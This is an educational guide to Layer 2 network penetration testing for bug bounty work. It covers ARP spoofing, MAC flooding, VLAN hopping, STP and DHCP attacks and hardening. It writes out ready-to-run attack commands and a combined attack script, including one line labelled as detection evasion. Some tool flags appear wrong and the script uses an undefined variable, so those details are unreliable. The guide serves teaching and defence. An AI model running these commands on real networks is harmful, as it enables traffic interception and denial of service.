Comprehensive Guide to Layer 2 Security Testing: From Theory to Bug Bounty Practice

Introduction

Layer 2 (Data Link Layer) security is often overlooked in penetration testing, yet it forms the foundation of network infrastructure security. This comprehensive guide bridges the gap between theoretical knowledge and practical application, focusing on how to approach Layer 2 security testing in authorized environments.

Conducting a Layer 2 security test for a specific domain like domain.tech presents a unique challenge. Unlike a web application, layer 2 (the Data Link Layer) is confined to the local network segment. This means you cannot directly test the switches or internal network infrastructure of domain.tech from the internet.

However, if your bug bounty scope explicitly includes testing the local network (for example, if you are on-site, or if the company provides VPN access that places you inside their network), the checklist you provided becomes highly relevant. In such a scenario, you would be acting as an attacker already inside the perimeter.

Important Disclaimer: This article is for educational purposes only. The techniques described should only be used on networks you own or have explicit written permission to test. Unauthorized use is illegal and violates bug bounty terms of service.

---

Table of Contents

1. Understanding Layer 2 Security
2. The Complete Testing Checklist
3. Kali Linux Tools Deep Dive
4. Practical Testing Scenarios
5. Mitigation Strategies
6. Bug Bounty Approach for Remote Targets

---

Understanding Layer 2 Security

Before diving into testing, it's crucial to understand what Layer 2 encompasses and why it matters:

What is Layer 2?

• OSI Model Layer: Data Link Layer
• Key Protocols: Ethernet, ARP, MAC addressing, VLANs, STP, CDP/LLDP
• Devices: Switches, bridges, network interface cards

Why Layer 2 Security Matters

• Foundation of Network Trust: All higher-layer communications depend on Layer 2 integrity
• Insider Threat Vector: Once an attacker gains internal access, Layer 2 becomes the primary attack surface
• Bypass Potential: Layer 2 attacks can circumvent firewalls and IDS/IPS

---

The Complete Testing Checklist

Here's your comprehensive Layer 2 security testing checklist with detailed explanations:

1. ARP Spoofing/Poisoning

Objective: Test if an attacker can intercept traffic between hosts Risk Level: Critical Impact: Man-in-the-Middle (MITM) attacks, credential theft, session hijacking

Test Steps:

• Verify if Dynamic ARP Inspection (DAI) is enabled
• Check ARP table behavior under attack
• Test ARP cache poisoning persistence

2. MAC Flooding

Objective: Test switch MAC table overflow behavior Risk Level: High Impact: Switch fails open, allowing traffic sniffing across VLANs

Test Steps:

• Determine switch MAC table size limitations
• Monitor switch behavior under stress
• Check for logging and alerts during attack

3. VLAN Hopping

Objective: Test VLAN isolation effectiveness Risk Level: High Impact: Unauthorized access to restricted network segments

Test Steps:

• Check DTP (Dynamic Trunking Protocol) configuration
• Verify native VLAN security
• Test double-tagging vulnerabilities

4. CDP/LLDP Information Leakage

Objective: Assess information disclosure risks Risk Level: Medium Impact: Network reconnaissance, device fingerprinting

Test Steps:

• Capture and analyze CDP/LLDP frames
• Document all discovered information
• Identify sensitive data exposure

5. STP Attacks

Objective: Test Spanning Tree Protocol security Risk Level: Medium-High Impact: Network topology manipulation, DoS conditions

Test Steps:

• Test BPDU guard effectiveness
• Attempt root bridge takeover
• Verify STP convergence behavior

6. DHCP Starvation

Objective: Test DHCP pool exhaustion protection Risk Level: Medium Impact: Denial of service for new network devices

Test Steps:

• Determine DHCP pool size
• Test rate limiting effectiveness
• Verify DHCP snooping configuration

7. MAC Address Spoofing

Objective: Test MAC-based security controls Risk Level: High Impact: Bypass MAC filtering, identity impersonation

Test Steps:

• Test sticky MAC learning behavior
• Verify MAC address change detection
• Check for MAC limit violations

8. Broadcast Storms

Objective: Test storm control mechanisms Risk Level: Medium Impact: Network degradation, DoS conditions

Test Steps:

• Generate controlled broadcast traffic
• Monitor network performance impact
• Test storm recovery behavior

9. Private VLAN Bypass

Objective: Test PVLAN isolation effectiveness Risk Level: High Impact: Bypass network segmentation

Test Steps:

• Test inter-host communication in isolated VLANs
• Verify proxy ARP vulnerabilities
• Check promiscuous port configurations

---

Kali Linux Tools Deep Dive

Essential Tools Installation and Usage

1. arpspoof (from dsniff)

# Installation
sudo apt-get install dsniff

# Basic ARP spoofing attack
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
arpspoof -i eth0 -t 192.168.1.1 192.168.1.100

# Advanced usage with custom timing
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1 -r

# Detection evasion techniques
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1 --daemon

2. macof (MAC Flooding)

# Installation (part of dsniff)
sudo apt-get install dsniff

# Basic MAC flooding
macof -i eth0 -n 10000

# Targeted flooding with specific source/destination
macof -i eth0 -s 192.168.1.50 -d 192.168.1.1 -e 00:11:22:33:44:55

# Continuous flooding
while true; do macof -i eth0 -n 1000; sleep 1; done

3. yersinia (Multi-protocol Layer 2 Attack Tool)

# Installation
sudo apt-get install yersinia

# Interactive mode
yersinia -I

# Command-line STP attack
yersinia stp -attack 1   # Become root bridge
yersinia stp -attack 2   # BPDU flood
yersinia stp -attack 3   # Configuration BPDU

# CDP attack
yersinia cdp -attack 1   # CDP table flood
yersinia cdp -attack 2   # CDP device announcement

4. dhcpig (DHCP Exhaustion)

# Installation
sudo apt-get install dhcpig

# Basic DHCP starvation
sudo dhcpig -v eth0

# Advanced options
sudo dhcpig -f 100 -s 5 -t 10 eth0  # 100 requests, 5 second wait, 10 threads
sudo dhcpig -c 1000 eth0             # 1000 concurrent requests
sudo dhcpig -r 0.0.0.0 eth0          # Use specific source IP

# With custom DHCP options
sudo dhcpig -o "option:value" eth0

5. voiphopper (VLAN Hopping)

# Installation
sudo apt-get install voiphopper

# CDP mode - jump to voice VLAN
voiphopper -i eth0 -E 2  # VLAN 2

# LLDP mode
voiphopper -i eth0 -L -V 10  # Jump to VLAN 10 using LLDP

# Continuous hopping
voiphopper -i eth0 -C -I 30  # Check every 30 seconds

6. above (Protocol Sniffer)

# Installation
git clone https://github.com/commonexploits/above.git
cd above
make
sudo make install

# Listen for CDP/LLDP/VTP/DTP
sudo above --interface eth0 --timer 60

# Output to file
sudo above --interface eth0 --timer 60 --output capture.txt

7. macchanger (MAC Spoofing)

# Installation
sudo apt-get install macchanger

# Random MAC address
sudo ip link set dev eth0 down
sudo macchanger -r eth0
sudo ip link set dev eth0 up

# Specific vendor MAC
sudo macchanger -m 00:11:22:33:44:55 eth0

# Show MAC history
macchanger -s eth0

8. hping3 (Broadcast Storm Generation)

# Installation
sudo apt-get install hping3

# UDP broadcast flood
hping3 --flood --rand-source --udp -p 80 192.168.1.255

# ICMP broadcast flood
hping3 --flood --rand-source --icmp 192.168.1.255

# TCP SYN broadcast flood
hping3 --flood --rand-source -S -p 80 192.168.1.255

Advanced Tool Combinations

Complete Layer 2 Attack Script

#!/bin/bash
# Comprehensive Layer 2 Security Testing Script
# FOR AUTHORIZED USE ONLY

INTERFACE="eth0"
TARGET_NETWORK="192.168.1.0/24"
GATEWAY="192.168.1.1"
LOG_FILE="l2_test_$(date +%Y%m%d_%H%M%S).log"

echo "=== Layer 2 Security Testing Started ===" | tee -a $LOG_FILE
echo "Target: $TARGET_NETWORK" | tee -a $LOG_FILE
echo "Interface: $INTERFACE" | tee -a $LOG_FILE
echo "========================================" | tee -a $LOG_FILE

# Phase 1: Reconnaissance
echo "[Phase 1] Network Discovery" | tee -a $LOG_FILE
arp-scan --localnet --interface $INTERFACE | tee -a $LOG_FILE
above --interface $INTERFACE --timer 30 | tee -a $LOG_FILE

# Phase 2: MAC Flooding Test
echo "[Phase 2] Testing MAC Flooding" | tee -a $LOG_FILE
timeout 30 macof -i $INTERFACE -n 5000 | tee -a $LOG_FILE

# Phase 3: DHCP Starvation Test
echo "[Phase 3] Testing DHCP Exhaustion" | tee -a $LOG_FILE
timeout 30 dhcpig -v $INTERFACE | tee -a $LOG_FILE

# Phase 4: ARP Spoofing Test
echo "[Phase 4] Testing ARP Spoofing" | tee -a $LOG_FILE
echo 1 > /proc/sys/net/ipv4/ip_forward
timeout 20 arpspoof -i $INTERFACE -t $GATEWAY $TARGET | tee -a $LOG_FILE

echo "=== Testing Complete ===" | tee -a $LOG_FILE

---

Practical Testing Scenarios

Scenario 1: Internal Network Assessment

Objective: Comprehensive Layer 2 security audit

Methodology:

1. Reconnaissance Phase

   # Discover live hosts
   nmap -sn 192.168.1.0/24
   
   # Capture CDP/LLDP information
   tcpdump -i eth0 -c 100 -w capture.pcap
   wireshark capture.pcap

2. Vulnerability Scanning Phase

   # Check for STP vulnerabilities
   yersinia -I
   
   # Test VLAN hopping
   voiphopper -i eth0 -E 2
   
   # Attempt ARP poisoning
   arpspoof -i eth0 -t 192.168.1.50 192.168.1.1

Scenario 2: VPN-Based Remote Testing

Objective: Test internal network through VPN access

Preparation:

# Configure VPN connection
sudo openvpn --config company.ovpn

# Verify you're on internal network
ip addr show
route -n

# Start testing within scope
arp-scan --localnet

---

Mitigation Strategies

Understanding defenses helps identify weak configurations:

1. ARP Spoofing Prevention

• Dynamic ARP Inspection (DAI) on trusted switches
• ARP spoofing detection tools (ArpON, Arpwatch)
• Static ARP entries for critical devices

2. MAC Flooding Protection

• Port security with MAC limiting
• MAC address table size management
• Storm control configuration

3. VLAN Hopping Prevention

• Disable DTP on all access ports
• Change native VLAN from default (VLAN 1)
• Explicitly tag all VLANs

4. STP Attack Prevention

• BPDU Guard on all access ports
• Root Guard on distribution switches
• PortFast only on end-user ports

Configuration Examples

Cisco Switch Hardening

! Global settings
no cdp run
spanning-tree portfast default
spanning-tree portfast bpduguard default

! Interface configuration
interface GigabitEthernet0/1
 switchport mode access
 switchport port-security
 switchport port-security maximum 2
 switchport port-security violation shutdown
 switchport port-security mac-address sticky
 spanning-tree portfast
 spanning-tree bpduguard enable
 storm-control broadcast level 50
 storm-control multicast level 30
 no cdp enable
 no lldp transmit
 no lldp receive

---

Bug Bounty Approach for Remote Targets

Since direct Layer 2 testing isn't possible remotely, here's how to adapt:

Phase 1: Scope Analysis

# Examine target domain
whois domain.tech
nslookup domain.tech
dig domain.tech ANY

# Check for VPN or internal access programs
# Review program scope document carefully

Phase 2: External Reconnaissance

# Gather infrastructure information
theHarvester -d domain.tech -b all
amass enum -d domain.tech

# Check for leaked internal data
# Search GitHub, pastebin for config files
# Look for exposed CDP/LLDP info in Shodan

Phase 3: If VPN Access Granted

# Only test IPs in scope
# Start with passive reconnaissance
tcpdump -i tun0 -c 1000 -w vpn_capture.pcap

# Analyze traffic patterns
wireshark vpn_capture.pcap

# Map the internal network
arp-scan --interface tun0 --localnet

Finding Layer 2-Related Bugs Remotely

1. Web Application Vulnerabilities

   • Look for internal IP disclosure
   • Check for network device web interfaces
   • Find configuration file leaks

2. Information Disclosure

   • Search for MAC addresses in HTML comments
   • Look for switch configurations in backups
   • Check for CDP/LLDP info in error messages

3. Network Segmentation Bypass

   • Test for SSRF to internal network
   • Check for exposed internal services
   • Look for VLAN hopping through web apps

---